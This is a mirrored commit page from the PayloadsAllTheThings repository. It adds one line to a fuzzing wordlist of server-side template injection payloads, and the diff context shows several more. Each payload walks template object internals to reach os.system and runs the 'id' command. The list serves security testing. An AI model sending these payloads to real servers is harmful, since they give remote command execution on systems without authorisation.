mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update ssti.fuzz
This commit is contained in:
parent
5b93737723
commit
438b9f7564
1 changed files with 1 additions and 0 deletions
|
@ -58,3 +58,4 @@ ${self.module.runtime.exceptions.util.os.system("id")}
|
|||
${self.template.__init__.__globals__['os'].system('id')}
|
||||
${self.module.cache.util.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.util.compat.inspect.os.system("id")}
|
||||
${self.template._mmarker.module.cache.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue